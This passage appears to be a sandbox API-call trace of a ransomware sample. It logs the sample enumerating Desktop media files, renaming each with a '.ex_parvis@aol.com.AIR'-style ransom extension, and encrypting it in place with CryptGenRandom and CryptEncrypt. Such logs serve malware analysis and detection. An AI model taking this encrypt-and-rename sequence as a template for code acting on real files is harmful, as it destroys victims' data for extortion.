	[0106.034] FindNextFileW (in: hFindFile=0x5dad70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x332f50d0, ftCreationTime.dwHighDateTime=0x1d4c8e2, ftLastAccessTime.dwLowDateTime=0x745407d0, ftLastAccessTime.dwHighDateTime=0x1d4cc49, ftLastWriteTime.dwLowDateTime=0x745407d0, ftLastWriteTime.dwHighDateTime=0x1d4cc49, nFileSizeHigh=0x0, nFileSizeLow=0xc7ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vaT01rvU.m4a", cAlternateFileName="")) returned 0
	[0106.034] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.034] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.034] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a", dwFileAttributes=0x80) returned 1
	[0106.034] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a") returned 72
	[0106.034] GetProcessHeap () returned 0x540000
	[0106.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf6) returned 0x598b60
	[0106.035] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a"
	[0106.035] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.035] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\vat01rvu.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\vat01rvu.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.038] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\vaT01rvU.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\vat01rvu.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514
	[0106.038] GetProcessHeap () returned 0x540000
	[0106.038] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.038] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=51181) returned 1
	[0106.038] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xc7ed
	[0106.038] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.038] GetProcessHeap () returned 0x540000
	[0106.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.038] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.040] WriteFile (in: hFile=0x514, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.041] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.041] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.041] ReadFile (in: hFile=0x514, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xc7ed, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xc7ed, lpOverlapped=0x0) returned 1
	[0106.043] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.043] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.043] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi", dwFileAttributes=0x80) returned 1
	[0106.043] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi") returned 75
	[0106.043] GetProcessHeap () returned 0x540000
	[0106.043] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8670
	[0106.043] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi"
	[0106.043] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.043] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\s88rwjqet02.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\s88rwjqet02.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.046] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\S88rWJqet02.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\s88rwjqet02.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514
	[0106.046] GetProcessHeap () returned 0x540000
	[0106.046] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.046] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1503) returned 1
	[0106.046] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5df
	[0106.046] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.046] GetProcessHeap () returned 0x540000
	[0106.046] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.046] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.047] WriteFile (in: hFile=0x514, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.047] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.047] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.047] ReadFile (in: hFile=0x514, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x5df, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x5df, lpOverlapped=0x0) returned 1
	[0106.048] SetFilePointer (in: hFile=0x514, lDistanceToMove=-1503, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.048] WriteFile (in: hFile=0x514, lpBuffer=0x609bb8*, nNumberOfBytesToWrite=0x5df, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesWritten=0x3a1f778*=0x5df, lpOverlapped=0x0) returned 1
	[0106.048] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.048] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.048] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a", dwFileAttributes=0x80) returned 1
	[0106.049] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a") returned 84
	[0106.049] GetProcessHeap () returned 0x540000
	[0106.049] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10e) returned 0x57fb28
	[0106.049] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a"
	[0106.049] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.049] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\d6mn1jhxf _n8-qkxfmf.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\d6mn1jhxf _n8-qkxfmf.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.052] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\D6mN1Jhxf _N8-qKxFMf.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\d6mn1jhxf _n8-qkxfmf.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514
	[0106.052] GetProcessHeap () returned 0x540000
	[0106.052] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.052] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=20235) returned 1
	[0106.052] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4f0b
	[0106.052] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.052] GetProcessHeap () returned 0x540000
	[0106.052] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.052] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.052] WriteFile (in: hFile=0x514, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.053] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.053] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.054] ReadFile (in: hFile=0x514, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x4f0b, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x4f0b, lpOverlapped=0x0) returned 1
	[0106.054] SetFilePointer (in: hFile=0x514, lDistanceToMove=-20235, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.054] WriteFile (in: hFile=0x514, lpBuffer=0x60ead0*, nNumberOfBytesToWrite=0x4f0b, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60ead0*, lpNumberOfBytesWritten=0x3a1f778*=0x4f0b, lpOverlapped=0x0) returned 1
	[0106.054] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.054] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.054] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv", dwFileAttributes=0x80) returned 1
	[0106.055] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv") returned 72
	[0106.055] GetProcessHeap () returned 0x540000
	[0106.055] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf6) returned 0x598b60
	[0106.055] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv"
	[0106.055] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.055] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\3o4 o-r4.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\3o4 o-r4.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.060] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\3O4 o-R4.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\3o4 o-r4.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514
	[0106.060] GetProcessHeap () returned 0x540000
	[0106.060] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.060] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=14231) returned 1
	[0106.061] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x3797
	[0106.061] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.061] GetProcessHeap () returned 0x540000
	[0106.061] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.061] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.061] WriteFile (in: hFile=0x514, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.062] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.062] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.062] ReadFile (in: hFile=0x514, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x3797, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x3797, lpOverlapped=0x0) returned 1
	[0106.062] SetFilePointer (in: hFile=0x514, lDistanceToMove=-14231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.062] WriteFile (in: hFile=0x514, lpBuffer=0x60d358*, nNumberOfBytesToWrite=0x3797, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60d358*, lpNumberOfBytesWritten=0x3a1f778*=0x3797, lpOverlapped=0x0) returned 1
	[0106.062] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.062] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.062] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a", dwFileAttributes=0x80) returned 1
	[0106.063] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a") returned 75
	[0106.063] GetProcessHeap () returned 0x540000
	[0106.063] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8670
	[0106.063] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a"
	[0106.063] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.063] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\-swzthvatd8.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\-swzthvatd8.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.073] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\-SwZTHVATD8.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\-swzthvatd8.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514
	[0106.073] GetProcessHeap () returned 0x540000
	[0106.073] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.073] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=39203) returned 1
	[0106.073] SetFilePointer (in: hFile=0x514, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x9923
	[0106.073] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.073] GetProcessHeap () returned 0x540000
